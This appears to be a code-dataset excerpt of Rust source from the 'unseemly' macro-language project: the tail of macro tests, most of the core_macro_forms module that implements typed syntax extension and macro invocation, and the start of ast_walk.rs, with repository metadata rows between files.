=> ,[body], } ]' }. ; in let x = eight ; y = times ; in (plus x y)"; let bound_wrong_ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), bound_wrong_prog, ) .unwrap(); assert_m!( ty::synth_type(&bound_wrong_ast, crate::runtime::core_values::core_types()), ty_err_p!(Mismatch(x, y)) => { assert_eq!(x, uty!({Int :})); assert_eq!(y, uty!({fn : [{Int :}; {Int :}] {Int :}})); } ); let inner_expr_wrong_prog = "extend_syntax Expr ::=also forall T S . '{ [ lit ,{ DefaultToken }, = 'let' [ pat := ( ,{ Pat<S> }, ) lit ,{ DefaultToken }, = '=' value := ( ,{ Expr<S> }, ) lit ,{ DefaultToken }, = ';' ] * lit ,{ DefaultToken }, = 'in' body := ( ,{ Expr< T > }, <-- ...[pat = value]... ) ] }' let_macro -> .{ '[Expr | match ...[,value, >> ,[value], ]... { ...[,pat, >> ,[pat],]... => ,[body], } ]' }. ; in let x = eight ; y = four ; in (plus x times)"; let inner_expr_wrong_ast = grammar::parse( &core_forms::outermost_form(), core_forms::outermost__parse_context(), inner_expr_wrong_prog, ) .unwrap(); assert_m!( ty::synth_type(&inner_expr_wrong_ast, crate::runtime::core_values::core_types()), ty_err_p!(Mismatch(x, times)) => { assert_eq!(x, uty!({Int :})); assert_eq!(times, uty!({fn : [{Int :}; {Int :}] {Int :}})); } ); // TODO: leaving out the `**[ ]**` results in an ICP; it should be a static error. let let_macro_prog = "extend_syntax Expr ::=also forall T S . '{ [ lit ,{ DefaultToken }, = 'let' [ pat := ( ,{ Pat<S> }, ) lit ,{ DefaultToken }, = '=' value := ( ,{ Expr<S> }, ) lit ,{ DefaultToken }, = ';' ] * lit ,{ DefaultToken }, = 'in' body := ( ,{ Expr<T> }, <-- ...[pat = value]... ) ] }' let_macro -> .{ '[Expr | match **[...[,value, >> ,[value], ]... ]** { **[...[,pat, >> ,[pat],]... ]** => ,[body], } ]' }. ; in let x = eight ; y = four ; in (plus y (plus x y))"; assert_eq!(eval_unseemly_program_top(let_macro_prog), Ok(val!(i 16))); } #[test] fn for_loop__macro() { // For whatever reason, this program uncovered a bunch of bugs. assert_eq!( eval_unseemly_program_top( r" extend_syntax Expr ::=also forall T S . '{ [ lit ,{ DefaultToken }, = 'let' [ pat := ( ,{ Pat<S> }, ) lit ,{ DefaultToken }, = '=' val := ( ,{ Expr<S> }, ) lit ,{ DefaultToken }, = ';' ] * lit ,{ DefaultToken }, = 'in' body := ( ,{ Expr<T> }, <-- ...[pat = val]... ) ] }' let_macro -> .{ '[Expr | match **[...[,val, >> ,[val], ]... ]** { **[...[,pat, >> ,[pat],]... ]** => ,[body], } ]' }. ; in extend_syntax Expr ::=also forall T . '{ [ lit ,{ DefaultToken }, = 'for' pat := ( ,{ Pat<T> }, ) lit ,{ DefaultToken }, = 'in' seq := ( ,{ Expr<Sequence<T>> }, ) body := ( ,{ Expr<Unit> }, <-- pat : T ) ] }' for_loop -> .{ '[Expr | (foldl ,[seq], **[]** .[unit : Unit arg : ,[prefab_type T], . let ,[pat], = arg ; in ,[body], ]. ) ]' }. ; in let foo = seven ; in for x in (range one three) (print (anything_to_string x))" ), // TODO: When subtyping has been improved, this should work: // `for x in (range one three) (print (anything_to_string (plus one x)))` Ok(val!(seq)) ); }
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
false
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/core_macro_forms.rs
src/core_macro_forms.rs
use crate::{ ast, ast::Ast, ast_walk::{ LazyWalkReses, WalkRule::{Body, LiteralLike, NotWalked}, }, beta::{Beta, Beta::*, ExportBeta}, core_forms::{strip_ee, strip_ql}, core_type_forms::{less_quoted_ty, more_quoted_ty}, form::{EitherPN::*, Form}, grammar::{ FormPat::{self, *}, SynEnv, }, name::*, runtime::{eval::Eval, reify::Reifiable}, ty::SynthTy, util::assoc::Assoc, walk_mode::WalkElt, }; use std::rc::Rc; // Macros! // // Macro expansion happens after typechecking. Macro expansion happens after typechecking. // You'd think I'd remember that better, what with that being the whole point of Unseemly, but nope. // Here's how macros work: // The programmer writes a macro definition, e.g.: // // extend_syntax macro // Expr ::=also // forall T . '{ (lit if) ,{Expr<Bool> | cond}, // (lit then) ,{Expr<T> | then_e}, // (lit else) ,{Expr<T> | else_e}, }' // conditional -> // '[Expr | match ,[cond], { // +[True]+ => ,[then_e], // +[False]+ => ,[else_e], } ]' // in // if (zero? five) then three else eight // // The parser parses the `if` as a macro invocation, but doesn't lose the '{…}'! // It spits out an `Ast` in which the `extend` binds `conditional` and `if ⋯` references it. // Under the hood, `conditional` has the type // `∀ T . [ *[ cond : Expr<Bool> then : Expr<T> else : Expr<T> -> Expr<T> ]* ] // ... even though it's a macro, not a function. (A kind-checker is needed here!) // // Everything is typechecked (including the `.{ ⋯ }.` implementation and the invocation). // The macro name (`conditional`) is a bit of a hack // The syntax extension is typechecked, much like a function definition is. // (`cond`, `then_e`, and `else_e` are assumed to be their respective types, // and the macro is shown to produce an `Expr<T>`.) // So is the invocation, which subtypes away the `T`, checks its arguments, and produces `T`. // // Macro expansion evaluates the macro with its arguments, `(zero? five)`, `three`, and `eight`, // producing a match statement. // // Finally, phase-0 evaluation produces a result of `8`! // It's best to read this file in the voice of the /Pushing Daisies/ narrator. // This macro is a helper for generating `FormPat`-generating syntactic forms. macro_rules! syntax_syntax { // atomic FormPat (( $($gram:tt)* ) $syntax_name:ident ) => { Rc::new(Form { name: n(&stringify!($syntax_name).to_lowercase()), grammar: Rc::new(form_pat!( $($gram)* )), type_compare: Both(NotWalked,NotWalked), // Not a type // Binds nothing synth_type: Both(NotWalked, cust_rc_box!(|_parts| { Ok(Assoc::new())}) ), eval: Positive(cust_rc_box!(|_parts| { Ok($syntax_name.reify())} )), quasiquote: Both(LiteralLike, LiteralLike) }) }; // FormPat with arguments (( $($gram:tt)* ) $syntax_name:ident ( $($arg:ident => $e:expr),* ) ) => { Rc::new(Form { name: n(&stringify!($syntax_name).to_lowercase()), grammar: Rc::new(form_pat!( $($gram)* )), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Negative(cust_rc_box!(|parts| { let mut out = Assoc::<Name, Ast>::new(); $( out = out.set_assoc(&parts.get_res(n(&stringify!($arg)))?); )* Ok(out) })), eval: Positive(cust_rc_box!(|parts| { Ok($syntax_name( $( { let $arg = parts.get_res(n(&stringify!($arg)))?; $e } ),* ).reify())} )), quasiquote: Both(LiteralLike, LiteralLike) }) }; // FormPat with arguments, and just doing `get_res` on everything doesn't work: (( $($gram:tt)* ) $syntax_name:ident { $type:expr } { $eval:expr }) => { Rc::new(Form { name: n(&stringify!($syntax_name).to_lowercase()), grammar: Rc::new(form_pat!( $($gram)* )), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Negative(cust_rc_box!( $type )), // Produces a typed value eval: Positive(cust_rc_box!( $eval )), quasiquote: Both(LiteralLike, LiteralLike) }) }; } // Macros have types! // ...but they're not higher-order (i.e., you can't do anything with a macro other than invoke it). // This means that we can just generate a type for them at the location of invocation. fn macro_type(forall_ty_vars: &[Name], arguments: Vec<(Name, Ast)>, output: Ast) -> Ast { let mut components = vec![]; for (k, v) in arguments.iter() { // The fields in a struct type are not renamed like normal during freshening, // so roll back any freshening that happened during evaluation, hence `unhygienic_orig`. // TODO: this can go wrong if a macro-defining macro collides two term names. // Fixing this probably requires rethinking how "component_name" works. // Perhaps not using structs at all might also work. components.push(mbe!("component_name" => (, ast!(k.unhygienic_orig())), "component" => (, v.to_ast()))); } let argument_struct = raw_ast!(Node( crate::core_forms::find_core_form("Type", "struct"), crate::util::mbe::EnvMBE::new_from_anon_repeat(components), ExportBeta::Nothing )); let mac_fn = u!({Type fn : [(, argument_struct)] (, output.to_ast())}); if forall_ty_vars.is_empty() { mac_fn } else { ast!({"Type" "forall_type" : "body" => (import [* [forall "param"]] (, mac_fn)), "param" => (,seq forall_ty_vars.iter().map(|n: &Name| { ast!(*n) }).collect::<Vec<_>>()) }) } } fn type_macro_invocation( parts: &LazyWalkReses<SynthTy>, expected_return: Ast, grammar: &FormPat, ) -> Result<Assoc<Name, Ast>, crate::ty::TypeError> { // Typecheck the subterms, and then quote them: let mut q_arguments = vec![]; // We need the macro's type vars to be usable in betas // (which is a little weird, but looks fine (see `for` in `build_a_language.unseemly`)). // So, we bind those names as terms referring to the environment, // and put them in the environment as if 'forall'ed. // Can't use `node_let!` because "macro_type_params" is a `trivial_form`. let macro__type_params = parts.get_term(n("macro__type_params")); let mut new_terms = parts.parts.clone(); let mut new_env = parts.env.clone(); let mut ty_vars = vec![]; for param in macro__type_params.node_parts().get_rep_leaf_or_panic(n("params")) { let param = param.to_name(); new_terms.add_leaf( param, crate::ast_walk::LazilyWalkedTerm::new(&raw_ast!(VariableReference(param))), ); new_env = new_env.set(param, raw_ast!(VariableReference(param))); ty_vars.push(param); } let parts = LazyWalkReses { parts: new_terms, env: new_env, ..parts.clone() }; for (binder, depth) in grammar.binders() { // Things like `token := (/some_stuff/)` are well-typed in all invocations; // examine things like `token := (,{Expr<T>},) let term_ty = if let Some(nt) = grammar.find_named_call(binder) { // For example, `body := (,{Expr<T>},)` if crate::core_type_forms::nt_is_positive(nt) { parts.flatten_res_at_depth( binder, depth, &|ty: Ast| more_quoted_ty(&ty, nt), &|ty_vec: Vec<Ast>| ast!({"Type" "tuple" : "component" => (,seq ty_vec) }), )? } else { parts.flatten_generate_at_depth( binder, depth, &|| crate::ty_compare::Subtype::underspecified(binder), &|ty_vec: Vec<Ast>| ast!({"Type" "tuple" : "component" => (,seq ty_vec) }), ) } } else { // For example, `token := /(foo)/`. // HACK: currently this is the only other type possible, // but if multiple ones become available, figuring out the right one is tricky. // (and ∀ T. T doesn't work: it's the opposite of what we want!) ast!({"Type" "Ident" :}) }; q_arguments.push((binder, term_ty)); } // This is lifted almost verbatim from "Expr" "apply". Maybe they should be unified? use crate::walk_mode::WalkMode; let _ = crate::ty_compare::is_subtype( &macro_type(&ty_vars, q_arguments.clone(), expected_return), &parts.get_res(n("macro_name"))?, &parts, ) .map_err(|e| crate::util::err::sp(e, parts.this_ast.clone()))?; // TODO: `Assoc` should implement `From<Vec<(K,V)>>` let mut res = Assoc::new(); for (k, v) in q_arguments { res = res.set(k, v.clone()) } Ok(res) } // This will be called at parse-time to generate the `Ast` for a macro invocation. // The form it emits is analogous to the "Expr" "apply" form. // Public for use in `expand.rs` tests. pub fn macro_invocation( grammar: FormPat, macro_name: Name, ty_params: Vec<Ast>, implementation: crate::runtime::eval::Closure, export_names: Vec<Name>, ) -> Rc<Form> { use crate::{ty_compare, walk_mode::WalkMode}; let impl_prefab = crate::runtime::eval::Value::Function(Rc::new(implementation)).prefab(); let grammar1 = grammar.clone(); let grammar2 = grammar.clone(); let trivial_form = crate::core_type_forms::type_defn("unused", form_pat!((impossible))); let params_holder = ast!({trivial_form ; "params" => (,seq ty_params)}); Rc::new(Form { name: n("macro_invocation"), // TODO: maybe generate a fresh name? grammar: Rc::new(form_pat!([ // `type_macro_invocation` expect these two to be set (named "macro__type_params", (anyways (, params_holder))), (named "macro_name", (anyways (vr macro_name))), // Capture this here so that its environmental names get freshened properly. // Need to store this one phase unquoted. (named "impl", (-- 1 (anyways (,impl_prefab)))), (, grammar.clone()) ])), type_compare: Both(NotWalked, NotWalked), // Invoked at typechecking time. // The macro_name part will be bound to a type of the form // ∀ T . [*[x : Nt<T> ⋯ ]* -> Nt<T>] // ... which you can imagine is the type of the implementation of the macro synth_type: Both( cust_rc_box!(move |parts| { let return_type = ty_compare::Subtype::underspecified(n("<return_type>")); let _ = type_macro_invocation(&parts, return_type.clone(), &grammar1)?; // What return type made that work? let q_result = ty_compare::unification.with(|unif| { let resolved = ty_compare::resolve( crate::ast_walk::Clo { it: return_type, env: parts.env.clone() }, &unif.borrow(), ); // Canonicalize the type in its environment: let resolved = ty_compare::canonicalize(&resolved.it, resolved.env); resolved.map_err(|e| crate::util::err::sp(e, parts.this_ast.clone())) })?; less_quoted_ty(&q_result, Some(n("Expr")), &parts.this_ast) }), cust_rc_box!(move |parts| { // From the macro's point of view, its parts are all positive; // they all produce (well, expand to), rather than consume, syntax. let parts_positive = parts.switch_mode::<SynthTy>(); let expected_return_type = more_quoted_ty(parts.context_elt(), n("Pat")); let arguments = type_macro_invocation(&parts_positive, expected_return_type, &grammar2)?; // What argument types made that work? let mut res: Assoc<Name, Ast> = Assoc::new(); ty_compare::unification.with(|unif| { for binder in &export_names { let ty = arguments.find_or_panic(binder); let binder_clo = ty_compare::resolve( crate::ast_walk::Clo { it: ty.clone(), env: parts.env.clone() }, &unif.borrow(), ); let binder_ty = ty_compare::canonicalize(&binder_clo.it, binder_clo.env) .map_err(|e| crate::util::err::sp(e, parts.this_ast.clone()))?; for (ty_n, ty) in parts.with_context(binder_ty).get_res(*binder)?.iter_pairs() { res = res .set(*ty_n, less_quoted_ty(ty, Some(n("Pat")), &parts.this_ast)?); } } Ok(res) }) }), ), // Kind of a HACK, but we re-use `eval` instead of having a separate field. // (maybe this should be a special case in the walk lookup instead?) eval: Positive(cust_rc_box!(move |parts| { use crate::runtime::eval::Value; // This code is like that for "apply". let mut env = parts.env.clone(); for (param, depth) in &grammar.binders() { let nt = grammar.find_named_call(*param); if nt != Some(n("DefaultAtom")) && nt != Some(n("Ident")) { // TODO: why not for those two NTs? let rhs = parts.map_flatten_term_at_depth( *param, *depth, &|mut a: &Ast| { // Nuke all binding, since we're abandoning its context. // The user will† deposit this syntax inside a replacement binding form. // (†still not enforced until issue #31 is fixed) while let ast::ExtendEnv(ref body, _) | ast::ExtendEnvPhaseless(ref body, _) = a.c() { a = &*body; } Value::from_ast(a) }, &|vec: Vec<Value>| Value::Sequence(vec.into_iter().map(Rc::new).collect()), ); env = env.set(*param, rhs); } } let impl_val = crate::runtime::eval::eval( crate::core_forms::strip_ql(parts.get_term_ref(n("impl"))), assoc_n!(), )?; let impl_clos = match &impl_val { Value::Function(clos) => clos, _ => icp!(), }; let expanded = Ast::reflect(&crate::runtime::eval::eval(&impl_clos.body, env)?); // Expand any macros produced by expansion, or that were already present in subterms: Ok(crate::expand::expand(&expanded)?.reify()) })), quasiquote: Both(LiteralLike, LiteralLike), }) } /// What should `t` be, if matched under a repetition? /// A tuple, driven by whatever names are `forall`ed in `env`. fn repeated_type(t: &Ast, env: &Assoc<Name, Ast>) -> Result<Ast, crate::ty::TypeError> { let mut drivers = vec![]; for v in t.free_vrs() { if env.find(&v).map(|a| a.c()) == Some(&ast::VariableReference(v)) { drivers.push(env.find_or_panic(&v).clone()); } } if drivers.is_empty() { // TODO: this is just a tuple where every element has the same type... // ...but how do we constrain the length? ty_err!(NeedsDriver (()) at t); } Ok(ast!({"Type" "tuple" : "component" => (,seq vec![ast!({"Type" "dotdotdot_type" : "driver" => (,seq drivers), "body" => (, t.clone()) })])})) } pub fn make_core_macro_forms() -> SynEnv { let trivial_type_form = crate::core_type_forms::type_defn("unused", form_pat!((impossible))); let beta_grammar = forms_to_form_pat_export![ syntax_syntax!( ((lit "nothing")) Nothing ) => [], syntax_syntax!( ([(named "name", (call "DefaultReference")), (lit ":"), (named "type", (call "DefaultReference"))]) Basic { |_| icp!("Betas are not typed") } { |parts| { Ok(Basic(parts.get_term(n("name")).vr_to_name(), parts.get_term(n("type")).vr_to_name()).reify()) } }) => [], syntax_syntax!( ([(named "name", (call "DefaultReference")), (lit "="), (named "type", (call "Type"))]) SameAs { |_| icp!("Betas are not typed") } { |parts| { Ok(SameAs(parts.get_term(n("name")).vr_to_name(), Box::new(parts.get_term(n("type")))).reify()) } }) => [], syntax_syntax!( ([(lit "prot"), (named "name", (call "DefaultReference"))]) Protected { |_| icp!("Betas are not typed") } { |parts| { Ok(Protected(parts.get_term(n("name")).vr_to_name()).reify()) } }) => [], syntax_syntax!( ([(lit "forall"), (named "name", (call "DefaultReference"))]) Underspecified { |_| icp!("Betas are not typed") } { |parts| { Ok(Underspecified(parts.get_term(n("name")).vr_to_name()).reify()) } }) => [], syntax_syntax!( ((delim "...[", "[", (named "sub", (call "Beta")))) ShadowAll { |_| icp!("Betas are not typed") } { |parts| { let sub = Beta::reflect(&parts.get_res(n("sub"))?); let drivers = sub.names_mentioned(); Ok(ShadowAll(Box::new(sub), drivers).reify()) } }) => [], syntax_syntax!( ((delim "[", "[", [(named "over", (call "Beta")), (lit "o>"), (named "under", (call "Beta"))])) Shadow { |_| icp!("Betas are not typed") } { |parts| { Ok(Beta::Shadow( Box::new(Beta::reflect(&parts.get_res(n("over"))?)), Box::new(Beta::reflect(&parts.get_res(n("under"))?))).reify()) } }) => [] ]; let capture_language_form = typed_form!("capture_language", (extend_nt [(lit "capture_language")], "OnlyNt", crate::core_extra_forms::extend__capture_language), Body(n("body")), Body(n("body"))); // Most of "Syntax" is a negative walk (because it produces an environment), // but lacking a `negative_ret_val`. let grammar_grammar = forms_to_form_pat_export![ syntax_syntax!( ( (delim "anyways{", "{", (named "body", (call "Expr"))) ) Anyways ( body => Ast::reflect(&body) )) => ["body"], // HACK: expanding to `'[Expr| capture_language]'` doesn't do what you want, so do this: Rc::new(Form { name: n("capture_language_form"), grammar: Rc::new(form_pat!( (lit "capture_language_form") )), type_compare: Both(NotWalked, NotWalked), synth_type: Negative(cust_rc_box!(|_| Ok(Assoc::new()))), eval: Positive(cust_rc_box!(move |_| { Ok(FormPat::Scope(capture_language_form.clone(), crate::beta::ExportBeta::Nothing).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], syntax_syntax!( ((lit "impossible")) Impossible ) => [], syntax_syntax!( ([(named "body", (call "Syntax")), (lit "reserving"), (star (named "words", (scan r"\s*'((?:[^'\\]|\\'|\\\\)*)'"))) ]) Reserved { |parts| { parts.get_res(n("body")) } } { |parts| { Ok(Reserved(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?)), parts.get_rep_term(n("words")).iter().map(Ast::to_name).collect::<Vec<_>>() ).reify()) } }) => ["body"], syntax_syntax!( ( // TODO: this might have to be both positive and negative [(lit "lit"), (named "body", (call "Syntax")), // Allow \\ and \' as escapes: (lit "="), (named "expected", (scan r"\s*'((?:[^'\\]|\\'|\\\\)*)'"))]) Literal { |parts| { parts.get_res(n("body")) } } { |parts| { let literal = parts.get_term(n("expected")).to_name().orig_sp() .replace(r#"\'"#, r#"'"#).replace(r#"\\"#, r#"\"#); Ok(FormPat::Literal(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?)), n(&literal)).reify()) } }) => [], syntax_syntax!( ([(lit "vr"), (delim "(", "(", (named "body", (call "Syntax")))]) VarRef ( body => Rc::new(FormPat::reflect(&body)) )) => [], // TODO: split out a separate SyntaxSeq, so that we can get rid of the [ ] delimiters syntax_syntax!( ( (delim "[", "[", (star (named "elt", (call "Syntax"))))) Seq { |parts| { let mut out = Assoc::<Name, Ast>::new(); for sub in &parts.get_rep_res(n("elt"))? { out = out.set_assoc(sub); } Ok(out) } } { |parts| { Ok(Seq(parts.get_rep_res(n("elt"))?.iter().map(|val| { Rc::new(FormPat::reflect(val)) }).collect()).reify()) } }) => [* ["elt"]], syntax_syntax!( ([(named "body", (call "Syntax")), (lit "*")]) Star { |parts| { let body : Assoc<Name, Ast> = parts.get_res(n("body"))?; body.map(|t| repeated_type(t, &parts.env)).lift_result() } } { |parts| { Ok(Star(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?))).reify()) } }) => ["body"], syntax_syntax!( ([(named "body", (call "Syntax")), (lit "+")]) Plus { |parts| { let body : Assoc<Name, Ast> = parts.get_res(n("body"))?; body.map(|t| repeated_type(t, &parts.env)).lift_result() } } { |parts| { Ok(Plus(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?))).reify()) } }) => ["body"], // TODO: support seprators, and add a separator here syntax_syntax!( ( (delim "alt[", "[", (star [(named "elt", (call "Syntax"))]))) Alt { |parts| { let mut out = Assoc::<Name, Ast>::new(); for sub in &parts.get_rep_res(n("elt"))? { out = out.set_assoc(sub); } Ok(out) } } { |parts| { Ok(Alt(parts.get_rep_res(n("elt"))?.iter().map(|val| { Rc::new(FormPat::reflect(val)) }).collect()).reify()) } }) => [* ["elt"]], syntax_syntax!( ([(named "plan_a", (call "Syntax")), (delim "or{", "{", (named "plan_b", (call "Syntax"))) ]) Biased ( plan_a => Rc::new(FormPat::reflect(&plan_a)), plan_b => Rc::new(FormPat::reflect(&plan_b)) )) => ["plan_a" "plan_b"], // `Named` switches to a positive mode for typechecking its body. // TODO: I don't think this makes sense, now that `Named` and `Call` are split apart: // TODO: replace `binder` with a `Pat`, and make the following true: // This has to have the same named parts as `unquote`, because it reuses its typechecker // But the type walk (as an overall quotation and locally) is always negative. syntax_syntax!( ([(named "part_name", atom), (lit ":="), (delim "(", "(", (named "body", (call "Syntax")))]) Named { |parts| { let binder = parts.get_term(n("part_name")).to_name(); Ok(Assoc::new().set(binder, parts.switch_mode::<SynthTy>().get_res(n("body"))?)) } } { |parts| { Ok(Named( parts.get_term(n("part_name")).to_name(), Rc::new(FormPat::reflect(&parts.get_res(n("body"))?))).reify()) } }) => ["part_name"], // `Call` without a type syntax_syntax!( ((delim ",{", "{", (named "nt", atom))) Call { |_| { Ok(Assoc::new()) // We should check that the nt is defined, but we can't here } } { |parts| { Ok(Call(parts.get_term(n("nt")).to_name()).reify()) } }) => [], // `Call` with a type is positive (has to be under a `Named`) Rc::new(Form { name: n("call_with_type"), grammar: Rc::new(form_pat!( (delim ",{", "{", [(named "nt", atom), (call "DefaultSeparator"), (scan r"(<)"), (named "ty_annot", (call "Type")), (call "DefaultSeparator"), (scan r"(>)")]))), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both(cust_rc_box!(|parts| { let expected_type = parts.get_res(n("ty_annot"))?; let nt = parts.get_term(n("nt")).to_name(); Ok(more_quoted_ty(&expected_type, nt)) }), NotWalked), eval: Positive(cust_rc_box!(|parts| { let nt = parts.get_term(n("nt")).to_name(); Ok(Rc::new(Call(nt)).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], // `Scan` can be positive or negative (may be under a `Named`) Rc::new(Form { name: n("scan"), grammar: Rc::new(form_pat!( [(call "DefaultSeparator"), (named "pat", (scan_cat r"/((?:[^/\\]|\\.)*)/", "string.regexp")), (alt [], [ (lit "as"), (call "DefaultSeparator"), (named "category", (scan r"((?:\p{Letter}|[-.])*)"))])])), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both( cust_rc_box!(|_| { Ok(ast!({"Type" "Ident" :})) }), cust_rc_box!(|_| { Ok(Assoc::new()) } )), eval: Positive(cust_rc_box!(|parts| { let regex = parts.get_term(n("pat")).to_name().orig_sp() .replace(r#"\/"#, r#"/"#); Ok(crate::grammar::new_scan( &regex, parts.maybe_get_term(n("category")).map(|a| a.to_name().orig_sp()) ).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], // `Common` can be positive or negative (may be under a `Named`) Rc::new(Form { name: n("common"), grammar: Rc::new(form_pat!( [(lit "common"), (delim "(", "(", (named "body", (call "Syntax")))])), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both( cust_rc_box!(|parts| { parts.get_res(n("body")) }), cust_rc_box!(|parts| { parts.get_res(n("body")) })), eval: Positive(cust_rc_box!(|parts| { Ok(Common(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?))).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => ["body"], // `Import` is positive (has to be under a `Named`) Rc::new(Form { name: n("import"), grammar: Rc::new(form_pat!( [(named "body", (call "Syntax")), (lit "<--"), (named "imported", (call "Beta"))])), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both(cust_rc_box!(|parts| { parts.get_res(n("body")) }), cust_rc_box!(|_| panic!("TODO prevent `import`s outside of `named`s"))), eval: Positive(cust_rc_box!(|parts| { Ok(NameImport(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?)), Beta::reflect(&parts.get_res(n("imported"))?)).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], // `Pick` is positive (has to be under a `Named`), but its body is negative. Rc::new(Form { name: n("pick"), grammar: Rc::new(form_pat!( [(lit "pick"), (named "selection", atom), (lit "in"), (named "body", (call "Syntax"))])), type_compare: Both(NotWalked,NotWalked), // Not a type synth_type: Both(cust_rc_box!(|parts| { let env = parts.switch_to_negative().get_res(n("body"))?; Ok(env.find_or_panic(&parts.get_term(n("selection")).to_name()).clone()) }), cust_rc_box!(|_| panic!("TODO prevent `pick`s outside of `named`s"))), eval: Positive(cust_rc_box!(|parts| { Ok(Pick(Rc::new(FormPat::reflect(&parts.get_res(n("body"))?)), parts.get_term(n("selection")).to_name()).reify()) })), quasiquote: Both(LiteralLike, LiteralLike) }) => [], // TODO: implement syntax for ComputeSyntax // Not sure if `Scope` syntax should be positive or negative. syntax_syntax!( ([(lit "forall"), (star (named "param", atom)), (lit "."), (delim "'{", "{", (named "syntax", (import [unusable "syntax"], (import [* [forall "param"]], (call "Syntax"))))), (named "macro_name", atom), (lit "->"), (delim ".{", "{", (named "implementation", // TODO: `beta!` needs `Shadow` so we can combine these `import`s. // TODO: Why can't these be regular imports, // and why can't the `--` be on the outside? // (Things have to be this way to have the `--` at all.) (import_phaseless [* [forall "param"]], // Arbitrary context element: (import_phaseless ["syntax" == {trivial_type_form ; }], (-- 1 (call "Expr")))))), (alt [], // TODO: needs proper `beta` structure, not just a name list: [(lit "=>"), (star (named "export", atom))])]) Scope { |parts| { let return_ty = parts.switch_mode::<SynthTy>().get_res(n("implementation"))?; let mut arguments : Vec<(Name, Ast)> = parts.get_res(n("syntax"))? .iter_pairs().map(|(n, t)| (*n, t.clone())).collect(); arguments.sort_by(|lhs, rhs| lhs.0.cmp(&rhs.0) ); // Pick a canonical order let ty_params = &parts.get_rep_term(n("param")).iter().map(Ast::to_name ).collect::<Vec<_>>(); Ok(Assoc::new().set(parts.get_term(n("macro_name")).to_name(), macro_type(&ty_params, arguments, return_ty))) } } { |parts| { // TODO: This is the right thing to do, right? let macro_params = crate::beta::bound_from_export_beta( &ebeta!(["syntax"]), &parts.this_ast.node_parts(), 0); let implementation = strip_ql(&strip_ee( &strip_ee(&parts.get_term(n("implementation"))))).clone(); let mut export = ExportBeta::Nothing; let export_names = parts.get_rep_term(n("export")).iter() .map(Ast::to_name).collect::<Vec<Name>>(); for name in &export_names {
rust
MIT
dd1f55be7b09b741a25af954c7a902eeac00a0c2
2026-01-04T20:20:52.848824Z
true
paulstansifer/unseemly
https://github.com/paulstansifer/unseemly/blob/dd1f55be7b09b741a25af954c7a902eeac00a0c2/src/ast_walk.rs
src/ast_walk.rs
// A lot of language implementation consists of walking an `Ast` while maintaining an environment. // // Our `Ast`s have baked-in information about // what should happen environment-wise, // so `walk` processes `ExtendEnv` and `VariableReference` on its own. // When it reaches a `Node`, the `Form` of that node specifies what to do, using a `WalkRule`. // The most interesting `WalkRule`, `Custom`, // specifies an arbitrary function on the results of walking its subterms, // but a lot of forms can use `Body`, // which means that the `Ast` structure already did all the work. // Subterms are walked lazily, since not all of them are even evaluable/typeable, // and they might need to be walked in a specific order. // There are different kinds of walks. Here are the major ones Unseemly needs so far: // // Evaluation produces a `Value` or an error. // During evaluation, each `lambda` form may be processed many times, // with different values for its parameters. // // Typechecking produces `Ast` or an error. // During typechecking, each `lambda` form is processed once, // using its parameters' declared types. // // Subtyping produces `Ast` (irrelevant) or an error. // It only walks type Asts, so `lambda` is not walked, // but ∀ is a binding form that acts sort of like type-level lambda, // except we use unification instead of explicit "function" calls. // // Quasiquotation, typically a part of evaluation, produces a `Value::AbstractSyntax`. // Typically, it is triggered by a specific quotative form, // and it's very simple to implement; it just reifies syntax // (until it hits a dotdotdot or unquote). // Unseemly is special in that `lambda` even binds under quasiquotation, // despite the fact that it doesn't do anything until the reified syntax is evaluated. // When we walk an `Ast`, we encounter many different forms. // // Some forms are positive, and some are negative. // // Positive forms (e.g. expressions and variable references) // are walked in an environment, and produce a "result" value. // // Negative forms (e.g. patterns and variable bindings) // still can access their environment, // but primarily they look at one special "context value" in it, and when they are walked, // they produce an environment from that context value. // // For example, suppose that `five` has type `nat` and `hello` has type `string`: // - the expression `struct{a: five, b: hello}` produces the type `struct{a: nat, b: string}` // - the pattern `struct{a: aa, b: bb}` produces // the envirnonment where `aa` is `nat` and `bb` is `string`. // // At runtime, something similar happens with values and value environments. // // Some forms are "ambidextrous". // Everything should be ambidextrous under quasiquotation, // because all syntax should be constructable and matchable. use crate::{ ast::{Ast, AstContents::*}, beta::*, name::*, runtime::{eval, reify}, util::{assoc::Assoc, mbe::EnvMBE}, walk_mode::{Dir, WalkElt, WalkMode}, }; use std::{cell::RefCell, rc::Rc}; /// A closed `Elt`; an `Elt` paired with an environment with which to interpret its free names. #[derive(Clone, Debug, PartialEq)] pub struct Clo<Elt: WalkElt> { pub it: Elt, pub env: Assoc<Name, Elt>, } impl<Elt: WalkElt> Clo<Elt> { pub fn env_merge(self, other: &Clo<Elt>) -> (Elt, Elt, Assoc<Name, Elt>) { // To reduce name churn (and keep environments from exploding in size), // we cut out the bits of the environments that are the same. let o_different_env = other.env.cut_common(&self.env); let o_renaming = o_different_env.keyed_map_borrow_f(&mut |name, _| ast!((vr name.freshen()))); let mut fresh_o_env = Assoc::new(); for (o_name, o_val) in o_different_env.iter_pairs() { fresh_o_env = fresh_o_env.set( o_renaming.find(o_name).unwrap().vr_to_name(), // HACK: VR -> Name Elt::from_ast(&crate::alpha::substitute(&Elt::to_ast(o_val), &o_renaming)), ); } ( self.it, Elt::from_ast(&crate::alpha::substitute(&Elt::to_ast(&other.it), 